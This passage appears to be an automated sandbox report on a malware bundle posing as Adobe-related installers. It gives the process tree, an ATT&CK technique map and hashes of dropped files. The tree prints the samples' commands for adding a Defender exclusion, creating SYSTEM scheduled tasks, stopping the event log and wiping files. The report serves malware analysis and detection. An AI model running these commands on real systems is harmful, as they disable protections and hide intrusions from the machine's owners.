- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1168
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:1400
- C:\Users\Admin\Documents\SimpleAdobe\oGahnUQ3rh3YlX0uwwfEFaVl.exe
  C:\Users\Admin\Documents\SimpleAdobe\oGahnUQ3rh3YlX0uwwfEFaVl.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Users\Admin\AppData\Local\Temp\is-L567R.tmp\oGahnUQ3rh3YlX0uwwfEFaVl.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-L567R.tmp\oGahnUQ3rh3YlX0uwwfEFaVl.tmp" /SL5="$600F4,5154567,54272,C:\Users\Admin\Documents\SimpleAdobe\oGahnUQ3rh3YlX0uwwfEFaVl.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:1068
  - - C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe
      "C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:1696
  - - C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe
      "C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:2840
- C:\Users\Admin\Documents\SimpleAdobe\5eKJaFRFmKEoBuRF04Qht3K2.exe
  C:\Users\Admin\Documents\SimpleAdobe\5eKJaFRFmKEoBuRF04Qht3K2.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Users\Admin\AppData\Local\Temp\7zS84E9.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2C.tmp\Install.exe
      .\Install.exe /FdidQOvZ "385137" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Enumerates system info in registry
      PID:2420
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2484
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 19:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\hHlFfRj.exe\" pa /dAdidlx 385137 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:2932
- C:\Users\Admin\Documents\SimpleAdobe\WP5Nq5GxZ5DdX9ZSLesFgf6D.exe
  C:\Users\Admin\Documents\SimpleAdobe\WP5Nq5GxZ5DdX9ZSLesFgf6D.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Users\Admin\Documents\SimpleAdobe\iHZU061ECvv4QIP9wPjdodDB.exe
  C:\Users\Admin\Documents\SimpleAdobe\iHZU061ECvv4QIP9wPjdodDB.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CFIECFIJDA.exe"
    3⤵
    - Loads dropped DLL
    PID:2968
  - - C:\Users\Admin\AppData\Local\Temp\CFIECFIJDA.exe
      "C:\Users\Admin\AppData\Local\Temp\CFIECFIJDA.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:3060
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1636
      - C:\Users\Admin\AppData\Local\Temp\1000006001\a3599e8794.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\a3599e8794.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AFHDHCAAKE.exe"
    3⤵
    PID:2052
- C:\Users\Admin\Documents\SimpleAdobe\w8VcQsjDmh1yU_gofgrWJrfe.exe
  C:\Users\Admin\Documents\SimpleAdobe\w8VcQsjDmh1yU_gofgrWJrfe.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Users\Admin\AppData\Local\Temp\7zS83FF.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Users\Admin\AppData\Local\Temp\7zS8BAC.tmp\Install.exe
      .\Install.exe /vtdidfAT "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Enumerates system info in registry
      PID:2368
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2604
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 19:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\HlFfRjm.exe\" q7 /dAhdidlx 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:1940
- C:\Users\Admin\Documents\SimpleAdobe\H8Isy54p_ndScl17d9UwhXLY.exe
  C:\Users\Admin\Documents\SimpleAdobe\H8Isy54p_ndScl17d9UwhXLY.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3064
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2220
  - - C:\ProgramData\HCBFIJJECF.exe
      "C:\ProgramData\HCBFIJJECF.exe"
      4⤵
      Executes dropped EXE
      PID:1560
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 96
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2736
  - - C:\ProgramData\GIIDBGDAFH.exe
      "C:\ProgramData\GIIDBGDAFH.exe"
      4⤵
      Executes dropped EXE
      PID:1216
  - - C:\ProgramData\JKJKJJDBKE.exe
      "C:\ProgramData\JKJKJJDBKE.exe"
      4⤵
      Executes dropped EXE
      PID:2700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 96
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJDHDGDAAAAK" & exit
      4⤵
      PID:2652
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2040

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:672
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2360
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:572
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2240

C:\Windows\system32\taskeng.exe
taskeng.exe {9CD781AB-B138-4A09-914F-C8CBE17CA95B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2884
- C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\hHlFfRj.exe
  C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\hHlFfRj.exe pa /dAdidlx 385137 /S
  2⤵
  - Executes dropped EXE
  PID:2060
- C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\HlFfRjm.exe
  C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\HlFfRjm.exe q7 /dAhdidlx 525403 /S
  2⤵
  - Executes dropped EXE
  PID:820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GIIDBGDAFH.exe

Filesize
520KB

MD5
3900de86228c8f839d6d4b483794457b

SHA1
90e24676fd3ebcda8635704e762e83d3fbd9cfba

SHA256
00c4e525ffb64ff858bb8922e3ab46ee6d65c67a3fa7d9f3a614aaf1604f27e3

SHA512
5bd0c7f623a6a3c11091391c72868c4462525618164d40a28a19dc5913766b7ebb2878206b4077a7374de23562343748e27e4594ad5c56434fb9fff40e91f4dc

Download Submit
C:\ProgramData\HCBFIJJECF.exe

Filesize
1.8MB

MD5
785a4d0ce6dee4c3bccd020a9d1b5ed9

SHA1
9d610511936fd60e388f344729c06a2db7479ade

SHA256
f5093c69b58ce1149d43a7ec268eba733115429e26ca23820571306571b31ead

SHA512
1fe0c987530a8183a0789f799bd949b1f8b2fb25bfc6110521dac5b68306f8e9c8028a952c9430b96a082c701760eade51a3112d9b8b04bf77f4c356d19d0f51

Download Submit
C:\ProgramData\IJDHDGDAAAAK\BFBFBF

Filesize
5KB

MD5
ce58468041b542ff97ee697548505bdd

SHA1
477aabb23f6f68c677e0f96c18ad9a5a8a4c43dc

SHA256
0a0478a93d9f52af8d894095ef7d3c754f0502b251005315baeab663e87c3f09

SHA512
74630cdb6e32854c905330ea18c8af013c2f53afb48e56eb16e9556d24dc3ff5c6e1e627efc937b90467983d043be3404f2f8b4303dc4d5dc462dfe86e31d2e6

Download Submit
C:\ProgramData\IJDHDGDAAAAK\FBFHDB

Filesize
92KB

MD5
69b4e9248982ac94fa6ee1ea6528305f

SHA1
6fb0e765699dd0597b7a7c35af4b85eead942e5b

SHA256
53c5e056da67d60a3b2872f8d4bda857f687be398ed05ed17c102f4c4b942883

SHA512
5cb260ab12c8cf0f134c34ae9533ac06227a0c3bdb9ad30d925d3d7b96e6fae0825c63e7db3c78852dc2a053767bbcfdd16898531509ffadade2dd7149f6241d

Download Submit
C:\ProgramData\JKJKJJDBKE.exe

Filesize
643KB

MD5
f03f43046831d8eee22e959770aaedf1

SHA1
3e63791066428f782286f4180f82631240326344

SHA256
04dbcbb46b56d4bff31ca8b58d398a90bca5f523a3ba6b8c7300e4ee19c54124

SHA512
128e942b7a1778385866e8ab336ef778d7e6248b037345c0d36dd8e8329ea7952956dc7ed30ee4af58fe22a319f26c28f7062916a07a4dcd3930d854cfc6f57e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
471B

MD5
d35e003e857182dcbf8492d701ca2a1e

SHA1
cdb4530edac092a41cadf74df0560d7de0f16d4d

SHA256
a2c4a147fc7dd9617b800c342816672db46b06ef05c11991b03933d68247163e

SHA512
fa7378b4562423a94163f23e4f55b433bdf6daf636bf35cdc290d98538c1dc765de0120889ebdfac7628d0c9294e0acef103cada44154c7a6dbff1789bc2e566

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ad0b462380856eb338ec926c694a48fd

SHA1
04f92db675718b4d951c28cfefa60362e6e0e07c

SHA256
513bb3325b53747c71e105e6f3223afbdb1c992391f280771440400188df318c

SHA512
07b35404a0447ad4083a3188cba332d8ab0daca64a481497cfe4b5f08b65de8a1eb00535ce7b38d984aba579d51cec09352608c37e28f35f4794b2a3ea99b2e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d01f76fb491e9f724e0aa3ed4830e7a5

SHA1
ada6b8203af0e1d98d1e9cdb4fb4860eed65b54b

SHA256
9c7147385f606d4819fc9da1d3a07ceb9133f373b67a6963d74ef786e6f1eb61

SHA512
26a943fa66a58bcacd03a01f70f5cca3d24a34380983326a5bc13f29377245a15285af5caf2533149548b1d3249a92f64e240bed21798a8b55d83857e60b56aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
91c490a2225a8f3ee511bec2906c8e9d

SHA1
6138cb63e85d6c77857f0bc6dfc7e11fa1a961b8

SHA256
cc1dd4d83ec228ab677a2ce6844b9db498e25402290cb12a6af6d16fd2ab029c

SHA512
69c24bce4ed261ad0cf577f32561f4228dc87d91dec6fca248cc14ba56fe6d8d68bf3f701f71659a21531d9ffcdcb1b89345a3a0bb936d64ea906b0a1f9e6f22

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
10692ae7d5b51b9a8cf85aa9636219b0

SHA1
c8c5b08be28f2a4af2e1a1a2a6c9a0f21e33e723

SHA256
19f0ffec0670a98dcb0ecb95afb35fbe7c4174d3e193c04962385c9c8a607b38

SHA512
f19e27f7b5e1cd9afab3f027b88a7ec17eb66c516e9a6416999a6ad929501342d458de08ab5a20786075f35174c8975df187d7ea9e8c5376cfc8ec47a91842a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e19f7c6d60f629168667c958df41ea07

SHA1
4babffc9b90f90deadea9d98a793a13e340f0f77

SHA256
87690681321fb4861109fd0c9bb514cc90ae2e808795735f6ade6a5d12a6db22

SHA512
2dd8a54e1ea4af0dc220294fee25030cee687cb35a14b679bcc097ec096e391c05e4790cb8a6fcc00621d6c39ef86027e8d0c384d7222a3f637c2c7d49204812

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dff750ea036687c2bdc84ec894a07cdf

SHA1
4ec1f238201eac00f16975144d0d6971aa73e678

SHA256
7ea446bcfd7e88e416d35ae98abebea65cefecb0015e93e6cc9224be5da0a6e5

SHA512
07b2c6454331f5307612a41d7be893023c527f97c7b774c90d18017308ff24225f7f8c1ed115e20aeac60b32ee5bd073c64d23a4bd7b1323869c8cf5161941ac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eb2b6cebb20ae38cf1fad50c467a7cda

SHA1
70ef110da87a2434c561c9fb8ec11b12f1e02201

SHA256
20065bfb517b3070fe563f76bdaefcfd38760f351e490b5be89c2ec69a72e997

SHA512
fae04c262f58c0b8ab0a6c14204de95db2746e59e3a023074b146a479bb1ff6032b5031b89ddc31e629101d44a3de4a8cfdb6723fdab7e9d5da22fbcd664a235

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2cb18f6e42a6e9036a733237f3b9af0e

SHA1
918f3cf2b087b0202b1524c14beb5d452fab8fc9

SHA256
2c9037c8954eaf87206be0fff428cf2fa602f7f944f0bedb40da6062a2d3dd1e

SHA512
5e3064ec0fa9efec201915923c7d65268f6cd04a739e59ee27fabba7103d430e328349c3cdcda4c9775cbe9fb6f49c8e349049d187ca7f0e544b5af9987a5da3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a2050ba2d997491530c2797ee81e429a

SHA1
2be18bac4e7dba74592412150e9df90dda51cb61

SHA256
472503fe7800df620db0ff1503890fe6f12b01ef9bffeecb937449b98e9e6bbf

SHA512
937c38d010acde0b4a4c5cfcf1e820b71a6b290b06e5ae0ab38af71933870d4775d4afb3fde89011eea3526a8423cb422f5aa59846936af49fbe3165f8a5f898

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2a36d2a09ffcc108fa0811c65350c80f

SHA1
fad31e632be681f94077ce40006e00c128396d5f

SHA256
b5e2785f82814a234ff3ddc84ca74fa96f5a97c5880d98901484a0d8c5840fbf

SHA512
2fd5e4e4d9fb8a9387cf3c88d825a5d071a50b0060d811ec8eea26f9340b85b8680f92f8fe2d2d7db29f43bcfc078a35892aa1edf83d64d2e1a31205064a136a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ff27dff7b97f633eaef121e34228de71

SHA1
8254f03b6c9f04207451839506de1fc1bf9c7b51

SHA256
066f1aac5c2c937511a4307bbd1758c02dc9684750f9ea49fad863cfeb2c6fe6

SHA512
0eb16a74543d95e8c543cb69e5b7800be46a4746bc26174af1a2804d21d9625a99f110fa091d19ff60fdd18eecae0072654966a600a6a55613ef3db761288761

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
400B

MD5
dd37cca8ad22c55b33b6d88157297094

SHA1
a33c059117f36d7d4e3842377f423dcb74385d51

SHA256
524ab4f0e99e94105a6ae91bc77977e0735b0c12aac13a9a50280ae31f5244a8

SHA512
bb29580f3b81835e6904674e6837e94c615d484c7119f420cd02ffc28df15f45a7901db0ea13a5be78ce6bb5329e9c688dd2406143941461cc774ec870bd51ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
ce43518be7b5d252dd55a6ae560da5bf

SHA1
3fa6b4d2218c68b4b8647507c22d8f2d84b6742b

SHA256
ecc385554f49ba7ff4021d236ae79afbd0bec019b772de834f6876b7770af054

SHA512
b9af0b8b8be201d129e9960c07f17393bc08a20b7bf925b980a6f6e5c9d27bdabcd6b73322d90022f21ef7eabccc833b63b8ff82cb3628fb7cf6d6a2e2bccec5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS84E9.tmp\Install.exe

Filesize
6.4MB

MD5
16c6176a7a12f11ef3f13ba4302a40f8

SHA1
3c53562968631f504024a22e59e2b4a177ab9188

SHA256
f4543b5caf1f43d5bccb276d349df84d0c5987e4619143813de456625bd6a297

SHA512
c0edc9de7d40d1bc688f1adb61cfad9265b09ad35fcf2dd09593f78247e8faf036742695256d62901c0ef6858342b5da1837daf11223fb95adcf032d76819d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar233F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe

Filesize
1.8MB

MD5
aafde9508ab816316b166a1073224dc8

SHA1
bfedf2944f3981a60bbf493a315532ed54184e94

SHA256
ada1004cc1a47dcd84892c3d73d826e5e028b243b555af9423b4b8bc5d8f92a8

SHA512
135a2ae455f28c58d69cef73852bfb57bedb9e4fe74d61f688577e062dec3176170048dc0d7abc99efafbf23f4604455146d0597969bacad1ba45ac46fcd0ca5

Download Submit
C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe

Filesize
3.7MB

MD5
a4314810759c9456741ee5422dec7d40

SHA1
134e37ab440160748bf18f7b4118bfa9e8462089

SHA256
f6e0869136b1793e3381ad5f47edfd2de8846688891958b691348a09d0e4a00f

SHA512
9b12747794263a5c5fda629ad4f8a7b858aa371aae9a8ca3917f13f9a4f2cdb7bfba1d4b4c1099bcd63da7c077f6bc95f27bdf2afb299c1e2e2a1d799526980c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e6fab022e0058cb6aced4ad259db95ae

SHA1
36ba580f911b6e33409eb721c2bfb990ea8ffcdc

SHA256
db0fd32a240f16cc3aa7711a4861677d83f44f46d959193089d05efa64cce0d1

SHA512
80dd5c89d83f62ecba7ccd0a0570c3f7ac700f35dbdb2aee22c2b213b9d70198a6cb6d7259ccee6d081ff386df43b3075dbf63d5ef9c0c1ba04665c5d984800d

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\5eKJaFRFmKEoBuRF04Qht3K2.exe

Filesize
7.2MB

MD5
8b9df0340b2a1611b2b7e82ed054211c

SHA1
12e943907a0a80311c2243b1a46ede6cfc713cf6

SHA256
daf394a884373933c9e68b41ced73ddd8fc457fe4549383f1001b5c92513df2f

SHA512
a5ecfee1331d7b89395d263d473e3ca5841e3890f87f4237cb95d97ab14d367badd6a5f163ab4b77c13b07bb196407bd637f4db80e5cf2cae8222512fe4491e8

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\H8Isy54p_ndScl17d9UwhXLY.exe

Filesize
4.3MB

MD5
67cef2b94174d0883a8e8b9ad9c217c7

SHA1
d674a6454b03d5190ea685112e68a6604eabfc39

SHA256
a928fc7218f8b916a6c386f500634dc2f31772ed5da82173b257ccf4371bdee7

SHA512
bd335514641c23f96063c92783bcc2e607c7765705aafa2e742b631c102c08704b1bc77ba61dce7f2267abd5e0e4a30653a50179f86689ecf348f5eb0057ea3c

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\WP5Nq5GxZ5DdX9ZSLesFgf6D.exe

Filesize
6.2MB

MD5
b9265c31743db2e9698a08df7b0c5e9d

SHA1
aa01367b13f827a5773d0781692809ae175bc718

SHA256
b2a10d42ed9b902a6a4a40b47da8448c9fa61f268f3ffb37d08bd5f5e213a0af

SHA512
1678d62ad17ce27394599f2835f3c1f209f544fdfae4c54034e7da06936768fe487a55811d9f0919018113af50153437ea0631968814910db69df0ffda36a133

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\iHZU061ECvv4QIP9wPjdodDB.exe

Filesize
2.4MB

MD5
853f97821f33b411e011296b97d0cff3

SHA1
99824a9224dd7e097cbc5804d2d9536555ef95ee

SHA256
d1f04b4bea67cbc6f469855826505a16e706b514858fa73c123df263ad34a292

SHA512
71bbd39e471766bcc4b4418d39ad0476cf3b894f9833be971df9b0c7a8691d51017c7f196a21844af19a0b7c5fe8f8bb05492ebf4013d05fbb29903a834e4fa2

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\mU7W6dl3sKXezbfcRrChUNdG.exe

Filesize
10.1MB

MD5
3b24971c5fef776db7df10a769f0857a

SHA1
ab314ddf208ef3e8d06f2f5e96f0f481075de0f4

SHA256
